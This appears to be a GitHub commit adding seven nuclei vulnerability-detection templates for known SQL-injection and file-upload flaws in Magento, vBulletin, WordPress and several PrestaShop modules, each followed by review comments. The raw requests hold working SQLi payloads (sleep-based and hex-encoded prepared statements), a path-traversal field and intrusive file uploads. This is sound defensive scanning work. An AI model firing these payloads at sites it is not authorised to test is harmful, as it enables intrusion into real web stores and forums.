Merge pull request #9362 from mastercho/magpre

Fixes and 2023 CVEs
patch-1
pussycat0x 2024-05-03 11:18:03 +05:30 committed by GitHub
commit 6a575971e0
7 changed files with 404 additions and 0 deletions


@ -0,0 +1,68 @@
id: CVE-2015-4455
info:
name: WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload
author: MaStErChO
severity: critical
description: |
Unrestricted file upload vulnerability in includes/upload.php in the Aviary Image Editor Add-on For Gravity Forms plugin 3.0 beta for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in wp-content/uploads/gform_aviary.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2015-4455
- http://packetstormsecurity.com/files/132256/WordPress-Aviary-Image-Editor-Add-On-For-Gravity-Forms-3.0-Beta-Shell-Upload.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2015-4455
cwe-id: CWE-434
epss-score: 0.28491
epss-percentile: 0.96807
cpe: cpe:2.3:a:aviary_image_editor_add-on_for_gravity_forms_project:aviary_image_editor_add-on_for_gravity_forms:*:beta:*:*:*:wordpress:*:*
metadata:
vendor: aviary_image_editor_add-on_for_gravity_forms_project
product: aviary_image_editor_add-on_for_gravity_forms
framework: wordpress
tags: cve,cve2015,packetstorm,intrusive,file-upload
variables:
filename: '{{rand_base(7, "abc")}}'
http:
- raw:
- |
GET /?gf_page=upload HTTP/1.1
Host: {{Hostname}}
- |
POST /?gf_page=upload HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=a54906fe12c504cb01ca836d062f82fa
--a54906fe12c504cb01ca836d062f82fa
Content-Disposition: form-data; name="field_id"
3
--a54906fe12c504cb01ca836d062f82fa
Content-Disposition: form-data; name="form_id"
1
--a54906fe12c504cb01ca836d062f82fa
Content-Disposition: form-data; name="gform_unique_id"
../../../
--a54906fe12c504cb01ca836d062f82fa
Content-Disposition: form-data; name="name"
{(unknown)}.phtml
--a54906fe12c504cb01ca836d062f82fa
Content-Disposition: form-data; name="file"; filename="{(unknown)}.jpg"
Content-Type: text/html
{{randstr}}
--a54906fe12c504cb01ca836d062f82fa--
matchers:
- type: dsl
dsl:
- 'contains(body_1, "Failed to upload file")'
- 'status_code_2 == 200'
- 'contains(body_2, "uploaded_filename\":\"{(unknown)}.jpg")'
condition: and
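Review bot: The `tags` line (`tags: cve,cve2015,packetstorm,intrusive,file-upload`) omits the framework even though `metadata.framework` is `wordpress`, so the template is not picked up by a `wordpress` tag filter; the conventional form is `tags: cve,cve2015,packetstorm,intrusive,file-upload,wordpress,wp-plugin`. The `metadata` block also lacks the `max-request` field that every other template in this commit carries; with two raw requests that would be `max-request: 2`. Since the template is tagged `intrusive` and its third `dsl` line only confirms that the second request's upload succeeded, it presumably leaves the uploaded `.jpg` on the target; a comment above `variables` such as `# intrusive: uploads a random-content .jpg that the template does not remove` would let operators weigh that before running it. The `{(unknown)}` tokens in the request body and in the last `dsl` line look like a rendering artifact standing in for the `{{filename}}` variable declared under `variables` (the same tokens appear in the Cart Abandonment Pro template); verify the source file references the variable by name.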


@ -0,0 +1,69 @@
id: CVE-2019-7139
info:
name: Magento - SQL Injection
author: MaStErChO
severity: critical
description: |
An unauthenticated user can execute SQL statements that allow arbitrary read access to the underlying database, which causes sensitive data leakage.
remediation: This issue is fixed in Magento 2.1 prior to 2.1.18, Magento 2.2 prior to 2.2.9, Magento 2.3 prior to 2.3.2.
reference:
- https://pentest-tools.com/blog/exploiting-sql-injection-in-magento-with-sqlmap
- https://www.ambionics.io/blog/magento-sqli
- https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13
- https://github.com/koutto/jok3r-pocs
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-7139
cwe-id: CWE-89
epss-score: 0.00582
epss-percentile: 0.778
cpe: cpe:2.3:a:magento:magento:*:*:*:*:open_source:*:*:*
metadata:
verified: true
max-request: 4
vendor: magento
product: magento
framework: magento
shodan-query: http.component:"Magento"
tags: cve,cve2019,sqli,magento
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 20s
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((6)))a)%3d1+--+- HTTP/1.1
Host: {{Hostname}}
- |
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0)%20--%20- HTTP/1.1
Host: {{Hostname}}
- |
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=1)%20--%20- HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers:
- type: dsl
name: time-based
dsl:
- 'duration_2>=6'
- 'status_code_1 == 200'
- 'contains(body_1, "text/x-magento-init")'
- 'contains(content_type_2, "application/json")'
condition: and
- type: dsl
name: blind-based
dsl:
- 'contains(body_1, "text/x-magento-init")'
- 'contains(content_type_3, "application/json") && contains(content_type_4, "application/json")'
- 'status_code_3 == 200 && status_code_4 == 400'
- 'len(body_3) == 2 && len(body_4) == 2'
condition: and
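Review bot: The `remediation` line reads `This issue is fixed in Magento 2.1 prior to 2.1.18, Magento 2.2 prior to 2.2.9, Magento 2.3 prior to 2.3.2.`, which inverts the meaning — those are the affected ranges, while the referenced advisory (`magento-2.3.2-2.2.9-and-2.1.18-security-update`) names the fixed releases; suggest `remediation: Upgrade to Magento 2.1.18, 2.2.9 or 2.3.2 (or later), which fix this issue.` The time-based matcher is well constrained here because `duration_2>=6` is combined with a baseline fingerprint (`contains(body_1, "text/x-magento-init")`) and a content-type check; a one-line comment above `matchers`, `# time-based: request 2 sleeps 6s when vulnerable; baseline checks limit false positives on slow hosts`, would record that intent for the reader. The `@timeout: 20s` annotation in this hunk is the form the other templates in this commit should follow; see the note on the AdvancedPopupCreator hunk.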


@ -0,0 +1,65 @@
id: CVE-2023-27032
info:
name: PrestaShop AdvancedPopupCreator - SQL Injection
author: MaStErChO
severity: critical
description: |
In the module “Advanced Popup Creator” (advancedpopupcreator) from Idnovate for PrestaShop, a guest can perform SQL injection in affected versions.
reference:
- https://security.friendsofpresta.org/modules/2023/04/11/advancedpopupcreator.html
- https://addons.prestashop.com/en/pop-up/23773-popup-on-entry-exit-popup-add-product-and-newsletter.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-27032
cwe-id: CWE-89
epss-score: 0.00106
epss-percentile: 0.42495
cpe: cpe:2.3:a:idnovate:popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter:*:*:*:*:*:prestashop:*:*
metadata:
max-request: 1
vendor: idnovate
product: popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter
framework: prestashop
shodan-query: http.component:"prestashop"
verified: true
tags: cve,cve2023,sqli,prestashop,advancedpopupcreator
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
@timeout 10s
POST /module/advancedpopupcreator/popup HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
availablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}
matchers:
- type: dsl
dsl:
- duration>=6
- status_code == 200
- contains(content_type, "text/html")
- contains_all(body, 'popups','hasError')
condition: and
extractors:
- type: regex
name: time
group: 1
regex:
- ',"time":([0-9]+),'
internal: true
- type: regex
name: token
group: 1
regex:
- ',"static_token":"([0-9a-z]+)",'
internal: true
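Review bot: The annotation on the second raw request is written `@timeout 10s` without the colon, while the Magento template in the same commit uses `@timeout: 20s` and the PireosPay template uses `@timeout: 10` with no unit; nuclei's request annotations take the `@key: value` form with a Go-style duration, so the colon-less and unit-less variants are likely ignored or rejected — confirm against the nuclei version in use and normalize both to `@timeout: 10s`. If the annotation is not applied, the `sleep(6)` probe runs under the default request timeout and the `duration>=6` matcher only fires when that default exceeds six seconds. A short comment above the request, `# 10s timeout: the probe is expected to take ~6s when vulnerable`, would document why the value matters.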


@ -0,0 +1,59 @@
id: CVE-2023-45375
info:
name: PrestaShop PireosPay - SQL Injection
author: MaStErChO
severity: high
description: |
In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.
reference:
- https://security.friendsofpresta.org/modules/2023/10/12/pireospay.html
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2023-45375
cwe-id: CWE-89
epss-score: 0.0005
epss-percentile: 0.17639
cpe: cpe:2.3:a:01generator:pireospay:*:*:*:*:*:prestashop:*:*
metadata:
max-request: 1
verified: true
vendor: 01generator
product: pireospay
framework: prestashop
shodan-query: http.component:"prestashop"
tags: cve,cve2023,sqli,prestashop,pireospay
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "/modules/pireospay/")
condition: and
internal: true
- raw:
- |
@timeout: 10
POST /module/pireospay/validation HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
ajax=true&MerchantReference=1%22;select(0x73656c65637420736c6565702836293b)INTO@a;prepare`b`from@a;execute`b`;--
matchers:
- type: dsl
dsl:
- duration>=6
- status_code == 302
- contains(content_type, "text/html")
condition: and
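Review bot: `metadata.max-request: 1` undercounts — the template issues two raw requests (the `GET /` fingerprint and the `POST /module/pireospay/validation` chained by `flow: http(1) && http(2)`), so it should be `max-request: 2`. The second request's annotation `@timeout: 10` lacks a duration unit, unlike `@timeout: 20s` in the Magento template; see the note on the AdvancedPopupCreator hunk for the normalization. The `description` states the affected range ("up to version 1.7.9") but, unlike the Magento and vBulletin templates, gives no `remediation`; `remediation: Update the PireosPay module past version 1.7.9 (see the linked advisory for the fixed release).` would follow the same convention without asserting a version the page does not give.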


@ -0,0 +1,45 @@
id: CVE-2023-46347
info:
name: PrestaShop Step by Step products Pack - SQL Injection
author: MaStErChO
severity: critical
description: |
In the module “Step by Step products Pack” (ndk_steppingpack) up to 1.5.6 from NDK Design for PrestaShop, a guest can perform SQL injection in affected versions.
reference:
- https://security.friendsofpresta.org/modules/2023/10/24/ndk_steppingpack.html
- https://stack.chaitin.com/poc/detail/3977
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-46347
cwe-id: CWE-89
epss-score: 0.00076
epss-percentile: 0.31923
cpe: cpe:2.3:a:ndkdesign:ndk_steppingpack:*:*:*:*:*:prestashop:*:*
metadata:
verified: true
max-request: 1
vendor: ndkdesign
product: ndk_steppingpack
framework: prestashop
shodan-query: http.component:"prestashop"
tags: cve,cve2023,sqli,prestashop,ndk_steppingpack
http:
- raw:
- |
@timeout: 10s
POST /modules/ndk_steppingpack/search-result.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
search_query=1%22%29;select+0x73656c65637420736c6565702836293b+into+@a;prepare+b+from+@a;execute+b;--
matchers:
- type: dsl
dsl:
- duration>=6
- contains(content_type, "text/html")
- contains(header, 'PrestaShop')
condition: and
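Review bot: The `matchers` block relies on `duration>=6` plus a content-type and a `PrestaShop` header check but, unlike the other time-based templates in this commit (`status_code == 200` in AdvancedPopupCreator, `status_code == 302` in PireosPay), checks no status code, so any `search-result.php` response that takes six seconds for unrelated reasons — a slow shared host, for instance — satisfies the matcher. If the expected response code is known, add `- status_code == 200` (or whichever code applies) to the `dsl` list; if it is not, a comment above `matchers` saying the omission is deliberate would at least record the trade-off.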


@ -0,0 +1,57 @@
id: prestashop-cartabandonmentpro-file-upload
info:
name: Prestashop Cart Abandonment Pro File Upload
author: MaStErChO
severity: critical
reference:
- https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/
- https://dh42.com/blog/prestashop-security/
metadata:
framework: prestashop
shodan-query: http.component:"prestashop"
verified: true
max-request: 1
tags: intrusive,file-upload,cartabandonmentpro,prestashop
variables:
filename: '{{rand_base(7, "abc")}}'
title: '{{rand_base(7, "abc")}}'
http:
- raw:
- |
POST /modules/{{paths}}/upload.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=xYzZY
--xYzZY
Content-Disposition: form-data; name="image"; filename="{(unknown)}.php.png"
Content-Type: image/png
<html>
<!-- {{title}} -->
</html>
--xYzZY--
payloads:
paths:
- 'cartabandonmentpro'
- 'cartabandonmentproOld'
stop-at-first-match: true
host-redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{(unknown)}.php.png"
- type: status
status:
- 200
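Review bot: The `info` block has no `description` (every other template in this commit has one), so a reader cannot tell which endpoint is exercised or what a match proves; add `description: |` with a sentence stating that the template posts a harmless file to `/modules/<module path>/upload.php` of the Cart Abandonment Pro module and treats the echoed `{{filename}}.php.png` name in a 200 response as confirmation. `metadata.max-request: 1` is also wrong for a template whose `payloads.paths` list has two entries (`cartabandonmentpro`, `cartabandonmentproOld`); even with `stop-at-first-match: true` the cap is `max-request: 2`. As with the Aviary template, the template is tagged `intrusive` and nothing removes the uploaded file, which the description should say.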


@ -0,0 +1,41 @@
id: vbulletin-search-sqli
info:
name: vBulletin `Search.php` - SQL Injection
author: MaStErChO
severity: high
description: |
vBulletin 4 is vulnerable to an SQL injection vulnerability, which may allow an attacker can execute malicious SQL statements that control a web application's database server.
remediation: Upgrade to the latest version of vBulletin.
reference:
- https://www.exploit-db.com/exploits/17314
- https://web.archive.org/web/20181129123620/https://j0hnx3r.org/vbulletin-4-x-sql-injection-vulnerability/
metadata:
verified: true
max-request: 1
shodan-query: http.component:"vBulletin"
tags: vbulletin,sqli
http:
- raw:
- |
POST /search.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
contenttypeid=7&do=process&humanverify=1&cat[]=-1%27
matchers-condition: and
matchers:
- type: word
part: body
words:
- "type=dberror"
- "MySQL Error"
condition: and
- type: status
status:
- 200
- 503
condition: or
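Review bot: The `description` sentence is ungrammatical — `which may allow an attacker can execute malicious SQL statements that control a web application's database server` — and should read `vBulletin 4 is vulnerable to SQL injection via search.php, which may allow an attacker to execute malicious SQL statements against the web application's database.` The `remediation` line (`Upgrade to the latest version of vBulletin.`) is generic; if the references identify a fixed release, naming it there would make the template actionable. The error-based matcher requires both `type=dberror` and `MySQL Error` in the body (`condition: and`), which is a reasonable guard against matching an unrelated database error page; a one-line comment above `matchers` noting that both markers are required would make the intent explicit.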